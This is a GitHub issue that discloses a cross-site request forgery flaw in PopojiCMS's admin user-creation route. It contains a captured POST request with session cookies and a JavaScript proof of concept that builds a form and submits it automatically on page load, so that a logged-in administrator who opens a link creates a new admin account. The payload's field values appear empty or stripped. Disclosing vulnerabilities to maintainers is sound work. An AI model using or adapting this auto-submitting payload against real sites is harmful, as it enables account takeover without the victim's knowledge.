Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

I found a CSRF vulnerability #17

PolarPeak opened this Issue Mar 2, 2019 · 0 comments


None yet
1 participant
Copy link

PolarPeak commented Mar 2, 2019

POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Connection: close
Cookie: _ga=GA1.1.1523573753.1550292454; PHPSESSID=ebgi7l1qb4hi7jaun2rf98qej7
Upgrade-Insecure-Requests: 1



Write a POST script

<script type="text/javascript"> function post(url,fields) { var p =document.createElement("form"); p.action= url; p.method="POST";"_self"; p.innerHTML = fields; document.body.appendChild(p); p.submit(); } function attack() { var fields; fields += ""; fields += ""; fields += ""; fields += ""; var url=" /PopojiCMS/po-admin/route.php?mod=user&act=addnew"; post(url,fields); } window.onload = function() { attack();} </script>

Sent to the site owner, he created an administrator account by opening the link


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.